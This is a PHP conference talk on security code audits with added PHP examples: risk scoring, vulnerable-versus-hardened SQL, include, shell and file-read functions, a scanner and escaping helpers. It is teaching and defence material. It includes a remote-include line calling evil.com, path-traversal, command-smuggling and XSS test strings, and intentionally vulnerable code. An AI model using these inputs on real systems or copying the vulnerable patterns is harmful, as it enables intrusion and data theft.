Do-It-Yourself Audits

Speaker notes:
  • Formally I am the boss of Stefan Esser. I am not sure if he knows it, though.
  • A database is 40.000 bugs. Any database.
  • Message: the number one target is information theft.
  • Don't care about XSS, care about SQL injection first.
  • That's something that banking or insurance companies do. Security experts for real-world security do it, and so does the Microsoft Security Development Lifecycle.
  • So in six years' time Stefan would be able to tell Marco: "Look, there has been a bug".
  • What to audit: are there money issues? Privacy issues? Are children involved? Sexual preferences?
  • Actually that's a term Microsoft coined.
  • Find easy-to-find vulnerabilities; identify parts of code involved in highly critical workflows.
  • White box audits.
  • Basically you need an IDE for hacking! Like Zend IDE, PDT.
  • Parameter binding just helps for 80% of SQL injection!

    1. Do-It-Yourself Audits. Dutch PHP Conference, Amsterdam 2008
    2. The bald guy in the front
    3. The bald guy in the front: Johann-Peter Hartmann. Full-time PHP developer since 3.0.4; loves LAMP, the great people, it's fun. Security is just fun. CTO and founder of Mayflower GmbH, CEO of SektionEins GmbH.
    4-6. Our business model. Mayflower GmbH: create insecure software. SektionEins GmbH: fix it. = Get paid twice.
    7. Agenda: State of Security for PHP; Risk Analysis; White Box Audits; Input Flow Analysis; Tools to help you
    8. PHP and Security
    9. Pie chart of attacker motivation, Profit vs. Fun, with shares of 67 % and 33 % (which share belongs to which motive is not recoverable from the extracted chart). Source: Breach 2007.
    10. Pie chart of attack goals: Information theft, Defacement, Malware, Unknown, Fraud, Blackmail, Link Spam, Worms, Phishing, Information Warfare. The individual percentages are not recoverable from the extracted chart; the largest slice is 42 %. Source: Breach 2007.
    11. Pie chart of vulnerability classes: SQL Injection, Information Disclosure, Known Exploits, XSS, Missing Authentication, Guessing of Logins/Sessions, OS Code Execution, Wrong configurations, Missing Anti-Automation, Denial of Service, Redirect, Wrong Session-Timeout, CSRF. The individual percentages are not recoverable from the extracted chart; the largest slice is 20 %. Source: NSI 2006.
    12. Risk Analysis
    13. Why do it, anyway? Best way: verify the whole application. Second best: audit the whole source code. Average: 2000 LOC/day. More than one year for a 500.000 LOC application. Marco just told me that he got a 3.000.000 LOC application.
    14. Better not audit everything.
    15-21. Check data flows for STRIDE. Check every data exchange point for: Spoofing (fake Referer, stolen session IDs); Tampering (XSS, CSRF); Repudiation (identity theft, identity coverage); Information Disclosure (SQL injections, XSS, ...); Denial of Service (logout after 3 failed logins); Elevation of Privileges (code executions, ...).
    22-27. How to analyze risks, by element type. External entities: Spoofing, Repudiation. Processes: Spoofing, Tampering, Repudiation, Information Disclosure, DoS, Elevation of Privileges. Database: Tampering, Information Disclosure, DoS. Data flow: Tampering, Information Disclosure, DoS.
    28. Now what's the absolute risk? Check out DREAD for every risk: Damage Potential, Reproducibility, Exploitability, Affected Users, Discoverability.
    29-31. Where to start auditing? risk = chance of attack * damage potential. High-risk example: SQL injection in a login form.
    32. Tools needed for manual source code audits. Some people say: you just need "grep". A decent code browser with syntax highlighting and good code navigation. Dynamic code analysis: a debugger with step-through, variable introspection and conditional breakpoints.
    33. Critical function analysis. Some functions are more dangerous than other methods. Every exploit class got its own set of functions; think of SQL injections, code executions. So just search for every critical function and check if the parameters are escaped correctly.
    34. SQL injections. Functions: mysql_query, mysqli_query, pdo::query, ..., your own database abstraction layer. What to check: are the parameters correctly escaped? Even numbers, sort orders and directions? Table and column names? Look out for proper escaping of values, column names, sort orders etc.
    35. Code executions. Functions: eval(), create_function(), preg_replace with modifier e, usort, uasort, *_callback functions. Written and included code: templates in Smarty, cache data. Look out for (external) variables in PHP code. Strings can contain code executions! "{${phpinfo}}"
    36. Code inclusions. Functions: (include|require)[_once]. Local: include "/var/log/http/access.log" with my Referer. Remote: include "http://evil.com/hack.gif". Other: "ftp://..", "php://input...", "data://...". allow_url_fopen does not protect against data and php!
    37. Shell executions. Functions: shell_exec (backticks!), exec(), system(), popen(), passthru(), mail()! Binary name and arguments need to be escaped. Check for the presence of escapeshellcmd() and escapeshellarg().
    38. Information leakage. Functions: fopen(), fread(), file(), ... Vulnerabilities: read local files containing database passwords, read intranet URLs, read local server configuration files. Check for injection of "/../../etc/passwd%00".
    39. Input flow analysis. Follow the path that variables take inside the application. Faster than a critical function analysis. PHP accepts every external variable by default, and the variables come from an untrusted environment. As soon as PHP gets a taint mode, PHP will help you a lot.
    40. Input flow analysis: $_GET, $_POST, $_COOKIE, some $_SERVER variables! Don't trust $HTTP_HOST. register_globals makes it hard to follow. Check if external variables, or results derived from them, are used in critical functions.
    41-46. XSS: output escaping check. Check every place where data is delivered to the user. There are 5 different versions of escaping for XSS: Text: htmlentities(); Attributes: htmlspecialchars(); URLs: urlencode(); JavaScript and stylesheet strings: addcslashes(); HTML: whitelist filters like HTML Purifier.
    47. Tools for static analysis. RATS (http://www.fortifysoftware.com/security-resources/rats.jsp) finds simple bugs like TOCTOU. PHP-SAT (http://www.program-transformation.org/PHP/PhpSat) got a freely definable set of rules for security checks. Armorize CodeSecure (http://www.armorize.com/). HyperSource, Fortify.
    48. Other tools. XSSS for automated XSS search (http://www.sven.de/XSSS). A lot of other web security scanners: SPIDynamics WebInspect, NStalker. Chorizo does PHP gray box scanning. .. a lot more.
    49. Summary. Even if you have time to do a full code review, use risk analysis to focus. Code review: use critical function analysis and output check, or input flow analysis. Tools can help you, but they don't do your job.
    50. Questions?
    51. Questions? Contact me at: johann-peter.hartmann@sektioneins.de
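Slides 28 to 31 put DREAD next to risk = chance of attack * damage potential but never show the arithmetic. The PHP script below is an added example, not material from the talk: the 1..10 scale per factor, the split of the five DREAD factors into a "chance" side (Reproducibility, Exploitability, Discoverability) and a "damage" side (Damage Potential, Affected Users), and the three sample threats are all this example's own assumptions.

```php
<?php
// Added example (not from the talk): rank threats from a STRIDE pass with DREAD scores,
// using risk = chance of attack * damage potential. Scale and factor split are assumptions.

declare(strict_types=1);

/**
 * Score one threat. $dread holds the keys damage, reproducibility, exploitability,
 * affectedUsers and discoverability, each an integer from 1 (low) to 10 (high).
 * Returns chance (1..10), damage (1..10) and risk (1..100).
 */
function dreadRisk(array $dread): array
{
    foreach (['damage', 'reproducibility', 'exploitability', 'affectedUsers', 'discoverability'] as $k) {
        if (!isset($dread[$k]) || $dread[$k] < 1 || $dread[$k] > 10) {
            throw new InvalidArgumentException("factor $k must be an integer from 1 to 10");
        }
    }
    // Damage side: how bad is it, and for how many users.
    $damage = ($dread['damage'] + $dread['affectedUsers']) / 2;
    // Chance side: how easily is it found, triggered and repeated.
    $chance = ($dread['reproducibility'] + $dread['exploitability'] + $dread['discoverability']) / 3;
    return [
        'chance' => round($chance, 1),
        'damage' => round($damage, 1),
        'risk'   => round($chance * $damage, 1),
    ];
}

/** Sort threats by risk, highest first, so the audit starts where it pays off most. */
function rankThreats(array $threats): array
{
    $ranked = [];
    foreach ($threats as $name => $dread) {
        $ranked[$name] = dreadRisk($dread);
    }
    uasort($ranked, fn(array $a, array $b): int => $b['risk'] <=> $a['risk']);
    return $ranked;
}

// Constructed sample: three findings from a hypothetical STRIDE pass over a web shop.
$threats = [
    'SQL injection in login form (Information Disclosure / Elevation of Privileges)' =>
        ['damage' => 9, 'reproducibility' => 9, 'exploitability' => 8, 'affectedUsers' => 10, 'discoverability' => 8],
    'Reflected XSS in search page (Tampering)' =>
        ['damage' => 5, 'reproducibility' => 8, 'exploitability' => 7, 'affectedUsers' => 4, 'discoverability' => 7],
    'Lockout after 3 failed logins (Denial of Service)' =>
        ['damage' => 3, 'reproducibility' => 10, 'exploitability' => 9, 'affectedUsers' => 6, 'discoverability' => 5],
];

foreach (rankThreats($threats) as $name => $score) {
    printf("risk %5.1f  chance %4.1f  damage %4.1f  %s\n", $score['risk'], $score['chance'], $score['damage'], $name);
}
```

With these constructed scores the login-form SQL injection lands on top (risk 79.2), which is exactly the "high risk example" of slide 31; the point of the exercise is the ordering, not the absolute numbers, since every team will calibrate the factors differently.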
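Slide 34 asks whether values, numbers, sort orders, directions and column names are all handled, and the speaker note adds that parameter binding alone only covers part of that. The following PHP is an added example, not code from the talk: a query built the way the slide warns about, beside a version that binds values, whitelists identifiers and casts the number. The products table, the in-memory SQLite database and the parameter names are constructed for this example.

```php
<?php
// Added example (not from the talk): SQL injection checklist of slide 34 in code.
// Table "products" (name, price, created_at) and the request parameters are constructed.

declare(strict_types=1);

// VULNERABLE: every request parameter is concatenated into the SQL text. "limit" is numeric
// only in the developer's head, and "sort"/"dir" land in ORDER BY, where placeholders
// cannot be used at all, so binding the search term alone would not fix this function.
function findProductsVulnerable(PDO $pdo, array $params): array
{
    $sql = "SELECT name, price FROM products WHERE name LIKE '%" . $params['q'] . "%'"
         . " ORDER BY " . $params['sort'] . " " . $params['dir']
         . " LIMIT " . $params['limit'];
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: values go through bound parameters; identifiers and keywords, which cannot be
// bound, are checked against a whitelist; the number is cast and range-limited.
const PRODUCT_SORT_COLUMNS = ['name', 'price', 'created_at'];

function findProductsSafe(PDO $pdo, array $params): array
{
    $sort = $params['sort'] ?? 'name';
    if (!in_array($sort, PRODUCT_SORT_COLUMNS, true)) {
        throw new InvalidArgumentException('unknown sort column');
    }
    $dir   = strtoupper((string) ($params['dir'] ?? 'ASC')) === 'DESC' ? 'DESC' : 'ASC';
    $limit = max(1, min(100, (int) ($params['limit'] ?? 20)));

    // Escape LIKE wildcards in the user's term so "%" and "_" stay literal characters.
    $term = '%' . strtr((string) ($params['q'] ?? ''), ['\\' => '\\\\', '%' => '\\%', '_' => '\\_']) . '%';

    $stmt = $pdo->prepare(
        "SELECT name, price FROM products WHERE name LIKE :term ESCAPE '\\' ORDER BY $sort $dir LIMIT :limit"
    );
    $stmt->bindValue(':term', $term, PDO::PARAM_STR);
    $stmt->bindValue(':limit', $limit, PDO::PARAM_INT);   // PARAM_INT keeps LIMIT numeric
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demo with an in-memory SQLite database and constructed rows.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE products (name TEXT, price REAL, created_at TEXT)');
$pdo->exec("INSERT INTO products VALUES ('Lamp', 19.9, '2008-06-01'), ('Laptop', 899.0, '2008-06-02')");

print_r(findProductsSafe($pdo, ['q' => 'La', 'sort' => 'price', 'dir' => 'desc', 'limit' => '10']));

// A sort value the whitelist does not know is rejected before any SQL is built.
try {
    findProductsSafe($pdo, ['q' => '', 'sort' => 'price; DROP TABLE products', 'dir' => 'asc', 'limit' => '1']);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```

The split is the one to remember during a critical function analysis: anything that is data goes through a placeholder, anything that is part of the SQL grammar (table, column, ASC/DESC) goes through a whitelist, and a number is cast before it is used.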
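Slides 36 to 38 each name a dangerous call and what to look for. The PHP below is an added example, not from the talk: the inclusion, shell execution and file read pattern from those slides, each beside a fixed form. The page map, the ping command and the upload directory are constructed for this example.

```php
<?php
// Added example (not from the talk): the call patterns of slides 36-38 and hardened forms.
// Page map, command and directory names are constructed for this example.

declare(strict_types=1);

// --- Slide 36: code inclusion ---------------------------------------------------------
// VULNERABLE: the page name comes straight from the request, so besides local files the
// operand can also be a URL or a php:// / data:// wrapper.
function loadPageVulnerable(string $page): void
{
    include $page . '.php';
}

// FIXED: the request value only selects from a fixed map; no request byte becomes a path.
const PAGES = ['home' => 'pages/home.php', 'contact' => 'pages/contact.php'];

function loadPageSafe(string $page): void
{
    if (!isset(PAGES[$page])) {
        http_response_code(404);
        return;
    }
    include __DIR__ . '/' . PAGES[$page];
}

// --- Slide 37: shell execution --------------------------------------------------------
// VULNERABLE: the argument is glued to the command line unescaped.
function pingVulnerable(string $host): string
{
    return (string) shell_exec('ping -c 1 ' . $host);
}

// FIXED: the value is validated against the shape of a host name, then wrapped with
// escapeshellarg() so the shell sees exactly one argument. mail()'s fifth argument reaches
// the sendmail binary the same way and deserves the same scrutiny.
function pingSafe(string $host): string
{
    if (!preg_match('/\A[A-Za-z0-9.-]{1,253}\z/', $host)) {
        throw new InvalidArgumentException('not a host name');
    }
    return (string) shell_exec('ping -c 1 ' . escapeshellarg($host));
}

// --- Slide 38: information leakage through file reads ---------------------------------
// VULNERABLE: "../../etc/passwd" walks out of the intended directory.
function readAttachmentVulnerable(string $name): string
{
    return (string) file_get_contents('/var/www/uploads/' . $name);
}

// FIXED: strip any directory part, resolve the real path (also follows symlinks) and
// require the result to stay below the base directory.
function readAttachmentSafe(string $name, string $baseDir): string
{
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . basename($name));
    if ($base === false || $real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('attachment not found');
    }
    return (string) file_get_contents($real);
}

// Demo (constructed): a temporary directory stands in for the upload folder.
$dir = sys_get_temp_dir() . '/uploads_' . uniqid();
mkdir($dir);
file_put_contents($dir . '/note.txt', "hello\n");
echo readAttachmentSafe('note.txt', $dir);                       // hello
try {
    readAttachmentSafe('../../../etc/passwd', $dir);
} catch (RuntimeException $e) {
    echo "blocked: {$e->getMessage()}\n";
}
try {
    pingSafe('example.org; id');
} catch (InvalidArgumentException $e) {
    echo "blocked: {$e->getMessage()}\n";
}
```

Each fixed function has the same shape: decide what the input is allowed to look like, reject everything else, and only then hand a canonical value to the dangerous call. That is also what to look for when reading someone else's code during the audit.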
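Slide 33 describes critical function analysis as searching for every dangerous function, and slides 39-40 add the input side: where $_GET, $_POST, $_COOKIE and friends enter. The following PHP script is an added example, not a tool from the talk: a "grep with a parser" that tokenises source with token_get_all(), reports calls to the function families listed on slides 34-38, flags include/require whose operand is not one string literal, and lists every read of a request superglobal. The function table and the sample source are this example's own constructed choices; like grep it deliberately over-reports (a `$pdo->query()` method call hits the sql rule too) and leaves the judgement to the auditor.

```php
<?php
// Added example (not from the talk): token-based critical function and input flow scanner.
// Function table and sample source are constructed for this example.

declare(strict_types=1);

const CRITICAL_FUNCTIONS = [
    'sql'   => ['mysql_query', 'mysqli_query', 'pg_query', 'query'],
    'exec'  => ['create_function', 'preg_replace', 'usort', 'uasort', 'call_user_func',
                'call_user_func_array', 'assert'],
    'shell' => ['shell_exec', 'exec', 'system', 'popen', 'passthru', 'proc_open', 'mail'],
    'file'  => ['fopen', 'fread', 'file', 'file_get_contents', 'readfile', 'fpassthru'],
];

const TAINT_SOURCES = ['$_GET', '$_POST', '$_COOKIE', '$_REQUEST', '$_FILES', '$_SERVER'];

/** Index of the next token after $i that is not whitespace or a comment, or null. */
function nextSignificant(array $tokens, int $i): ?int
{
    for ($j = $i + 1, $n = count($tokens); $j < $n; $j++) {
        $t = $tokens[$j];
        if (is_array($t) && in_array($t[0], [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true)) {
            continue;
        }
        return $j;
    }
    return null;
}

/** Line of token $i; single-character tokens carry no line, so walk backwards. */
function lineOf(array $tokens, int $i): int
{
    for ($j = $i; $j >= 0; $j--) {
        if (is_array($tokens[$j])) {
            return $tokens[$j][2];
        }
    }
    return 1;
}

/** Scan PHP source; returns findings as [line, category, description], sorted by line. */
function scanSource(string $code): array
{
    $findings   = [];
    $tokens     = token_get_all($code);
    $inBacktick = false;

    foreach ($tokens as $i => $tok) {
        if (!is_array($tok)) {
            if ($tok === '`') {                       // backtick operator is shell_exec()
                if (!$inBacktick) {
                    $findings[] = [lineOf($tokens, $i), 'shell', 'backtick operator (shell_exec)'];
                }
                $inBacktick = !$inBacktick;
            }
            continue;
        }
        [$id, $text, $line] = $tok;

        if ($id === T_VARIABLE && in_array($text, TAINT_SOURCES, true)) {
            $findings[] = [$line, 'input', "$text read"];
        } elseif ($id === T_EVAL) {                   // eval is a language construct, not T_STRING
            $findings[] = [$line, 'exec', 'eval() call'];
        } elseif (in_array($id, [T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE], true)) {
            // Accept only a single string literal as operand; anything else is a finding.
            $j = nextSignificant($tokens, $i);
            if ($j !== null && $tokens[$j] === '(') {
                $j = nextSignificant($tokens, $j);
            }
            $literal = $j !== null && is_array($tokens[$j]) && $tokens[$j][0] === T_CONSTANT_ENCAPSED_STRING;
            $k = $literal ? nextSignificant($tokens, $j) : null;
            if (!$literal || ($k !== null && $tokens[$k] === '.')) {
                $findings[] = [$line, 'file', "$text with non-literal path"];
            }
        } elseif ($id === T_STRING || (defined('T_NAME_FULLY_QUALIFIED') && $id === T_NAME_FULLY_QUALIFIED)) {
            $j = nextSignificant($tokens, $i);
            if ($j === null || $tokens[$j] !== '(') {
                continue;                             // a constant or class name, not a call
            }
            $name = strtolower(ltrim($text, '\\'));   // \system() on PHP 8 tokenises with the backslash
            foreach (CRITICAL_FUNCTIONS as $cat => $names) {
                if (in_array($name, $names, true)) {
                    $findings[] = [$line, $cat, "$name() call"];
                }
            }
        }
    }
    usort($findings, fn(array $a, array $b): int => $a[0] <=> $b[0]);
    return $findings;
}

// Constructed sample source with one instance of each pattern the slides name.
$sample = <<<'PHP'
<?php
$id   = $_GET['id'];
$rows = mysql_query("SELECT * FROM users WHERE id = " . $id);
include $_GET['page'] . '.php';
$out  = `ls -la {$_POST['dir']}`;
system('convert ' . $_FILES['img']['tmp_name']);
eval('return ' . $_COOKIE['expr'] . ';');
echo htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8');
PHP;

foreach (scanSource($sample) as [$line, $cat, $what]) {
    printf("line %2d  %-6s %s\n", $line, $cat, $what);
}
```

Run against the sample it lists the superglobal reads on lines 2 and 4 to 8 next to the mysql_query, include, backtick, system and eval findings on lines 3 to 7, so the auditor sees input and sink on the same line and can start tracing the flow between them; line 8 only shows an input read, because htmlspecialchars() is not in the critical table.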
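Slides 41 to 46 list one escaping function per output context. The PHP class below is an added example, not code from the talk: one helper per context applied to the same constructed attacker string, using the functions the slide names (htmlentities, htmlspecialchars, urlencode, addcslashes); the HTML-fragment case belongs to a whitelist filter such as HTML Purifier and is only noted in a comment.

```php
<?php
// Added example (not from the talk): the five escaping contexts of slides 41-46.

declare(strict_types=1);

final class Esc
{
    // Element text: every character that has a named entity becomes that entity.
    public static function text(string $s): string
    {
        return htmlentities($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }

    // Attribute value: quotes must be escaped (ENT_QUOTES) and the attribute must be
    // quoted in the template, otherwise a space already ends the value.
    public static function attr(string $s): string
    {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }

    // Query-string parameter: percent-encode, then HTML-escape, because the URL sits in an
    // attribute. Two contexts, two layers of escaping, applied inside out.
    public static function urlParam(string $s): string
    {
        return self::attr(urlencode($s));
    }

    // JavaScript or CSS string literal: backslash-escape quotes, backslashes and line
    // breaks, plus "/", "<" and ">" so that "</script>" inside the data cannot end the
    // script block (the HTML parser does not know about backslashes, so "<" alone would
    // not be enough; escaping "/" turns "</script" into "<\/script").
    public static function jsString(string $s): string
    {
        return addcslashes($s, "\\\"'\n\r/<>&");
    }
}

$input = '"><script>alert(1)</script>';   // constructed attacker input

echo '<p>' . Esc::text($input) . "</p>\n";
echo '<input value="' . Esc::attr($input) . "\">\n";
echo '<a href="/search?q=' . Esc::urlParam($input) . "\">link</a>\n";
echo "<script>var q = '" . Esc::jsString($input) . "';</script>\n";
// HTML fragments that must keep their markup (a comment editor, for example) cannot be
// escaped at all: run them through a whitelist filter such as HTML Purifier and emit the
// filtered result unchanged.
```

The output check of slide 41 is then a matter of looking at every echo or template variable and asking which of these five helpers it went through; a value that went through none, or through the wrong one for its context, is the finding. For JavaScript values json_encode() with the JSON_HEX_TAG, JSON_HEX_QUOT, JSON_HEX_APOS and JSON_HEX_AMP flags is the usual choice today and covers the same cases as the addcslashes() call above.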
